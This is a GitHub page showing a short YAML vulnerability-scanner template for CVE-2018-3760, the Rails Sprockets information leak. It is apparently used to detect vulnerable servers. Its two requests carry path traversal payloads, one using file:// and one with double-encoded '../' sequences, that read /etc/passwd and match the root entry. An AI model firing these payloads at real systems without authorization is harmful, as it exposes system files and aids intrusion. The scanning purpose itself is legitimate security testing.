forked from CharanRayudu/Custom-Nuclei-Templates
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2018-3760.yaml
33 lines (29 loc) · 961 Bytes
/
CVE-2018-3760.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
id: cve-2018-3760
info:
name: Rails Sprockets Information Leak
risk: High
params:
- root: '{{.BaseURL}}'
variables:
- endpoint: |
assets/
requests:
- method: GET
url: >-
{{.root}}/{{.endpoint}}file:%2f%2f/etc/passwd
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
- >-
StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
- method: GET
redirect: false
url: >-
{{.root}}/{{.endpoint}}/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
references:
- https://www.cvebase.com/cve/2018/3760